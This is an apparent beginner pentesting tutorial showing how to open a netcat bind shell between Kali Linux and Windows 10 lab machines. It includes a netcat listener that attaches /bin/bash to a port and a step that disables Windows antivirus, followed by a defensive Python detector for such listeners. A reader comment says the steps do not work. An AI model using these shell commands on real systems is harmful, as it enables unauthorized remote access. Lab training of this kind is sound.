How to create a bind shell between Windows 10 and Kali Linux using Netcat

In the previous article we created a shell between Kali Linux and Windows 10 virtual machines, but the problem was that we couldn't run commands.

This is the link to the previous article:


In this tutorial we're gonna find out how to create a bind shell between Kali Linux and Windows 10.

Note:

This is a beginner tutorial.

Note:

I'm creating this tutorial in my pentesting lab on my PC. Make sure to use this tutorial in a laboratory environment and not on someone else's computer without permission. Any attempt to break into computer systems without authority is illegal and can be pursued by law enforcement.

Note:

Before trying to get your hands dirty on this tutorial, make sure your system meets the requirements below.


Requirements:

  • Kali Linux virtual machine.
  • Windows 10 virtual machine.
  • A shared network between the above virtual machines (where each virtual machine can ping the other).


Let's start

Step 1:

In the Kali Linux virtual machine, open Terminal and type this command to go to the Windows binaries directory:

cd /usr/share/windows-binaries        


Step 2:

Now we need to create a web server here, so type this command:

python3 -m http.server 8080        

This command starts an HTTP server on port 8080 that serves the current directory. Other virtual machines on the network can reach it at the IP address of the Kali Linux virtual machine, provided port 8080 is open on the Kali Linux virtual machine.


Step 3:

Now, disable the antivirus on the Windows 10 virtual machine.

As you can see in the picture above, I have disabled the real-time protection of Windows 10.


Step 4:

Now open the browser on the Windows 10 machine. The IP address of my Kali Linux virtual machine is 192.168.10.10 and the HTTP server is listening on port 8080, so enter this address:

192.168.10.10:8080        

You will see a page like this:

Now, on the page shown above, click on nc.exe to download it.

You will see a page like the one above. Click on the three-dot menu beside the name of the file, click Keep, and then click Keep anyway.


Step 5:

Now go back to Kali Linux and type the command below in the terminal to create a netcat shell:

nc -n -l -v -p 1234 -e /bin/bash        

-n means use numeric IP addresses only, with no DNS lookups.

-l means listen for inbound connections.

-v is verbose mode.

-p specifies the local port to listen on, which here is 1234.

-e specifies the program to run and attach to the connection once a client connects; here it is the bash shell.

You can use the command below too (the shorter version):

nc -nlvp 1234 -e /bin/bash        

And you can see something like this:


Step 6:

Now go to Windows 10, open CMD in the folder where you downloaded nc.exe, and enter this command:

nc.exe -nv 192.168.10.10 1234        

And you can see something like this:

Now the bind shell between Kali Linux and Windows 10 has been opened, and you can execute bash shell commands from Windows 10 on Kali Linux. For example, in CMD on Windows 10 enter this command:

whoami        

You will see something like this:

As you can see, it returned kali, which is the username on the Kali Linux virtual machine.
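The listener from Step 5 is the kind of command line a defender looks for in process-creation logs. The sketch below is an added example, not part of the original tutorial: it parses a netcat command line, including clustered short options such as -nlvp, and flags a listener that has a program attached with -e. The function names, the binary-name list and the sample lines are assumptions constructed for illustration.

```python
import re
import shlex

# Binary names treated as netcat (assumption; extend for your environment).
NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "nc.traditional"}
# Options that consume a value in netcat-traditional; all others are boolean.
VALUE_OPTS = set("cegGiopqsTw")

def parse_nc(cmdline):
    """Return (flags, values) for a netcat command line, else None."""
    try:
        # posix=False keeps Windows backslashes intact; quotes are stripped by hand.
        argv = [t.strip("\"'") for t in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes
        return None
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in NC_NAMES:
        return None
    flags, values, args, i = set(), {}, argv[1:], 0
    while i < len(args):
        tok = args[i]
        i += 1
        if len(tok) < 2 or not tok.startswith("-"):
            continue  # positional argument (host or port)
        for pos, ch in enumerate(tok[1:], start=1):
            flags.add(ch)
            if ch in VALUE_OPTS:
                rest = tok[pos + 1:]  # value glued to the cluster, e.g. -p1234
                if rest:
                    values[ch] = rest
                elif i < len(args):   # value is the next token, e.g. -nlvp 1234
                    values[ch] = args[i]
                    i += 1
                break
    return flags, values

def classify(cmdline):
    """Return (verdict, port, program) for one process command line."""
    parsed = parse_nc(cmdline)
    if parsed is None:
        return ("not-netcat", None, None)
    flags, values = parsed
    program = values.get("e") or values.get("c")
    if program and "l" in flags:
        return ("bind-shell-listener", values.get("p"), program)
    if program:
        return ("exec-on-connect", None, program)
    return ("listener" if "l" in flags else "client", values.get("p"), None)
```

Feeding it the command lines from process-creation events (for example auditd execve records or Sysmon Event ID 1) gives the long and short forms from Step 5 the same verdict, while the Step 6 client is reported as an ordinary client.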


The problem:

Now we have created a bind shell between two virtual machines, but you can only run commands from Windows 10 and watch them execute on Kali Linux. What about a scenario where we want to run commands from Kali Linux?

For this purpose we need a reverse shell, and I'll try to teach it to you in the next articles.














Brahmaji Bandaru

$Virtual_CISO Services$ | #CISM | #AI/ML/DL Playbooks | #Appsec | #CloudSecurity | #SOAR | #SIEM | #SOC | #CTH/CTI | #IR | #CSIRF | #BEC | #DLP | #XDR | #CERT | #Architect | #CNAPP

12 months

It is unreal. Somewhere he copied paths. Nothing works in this practical
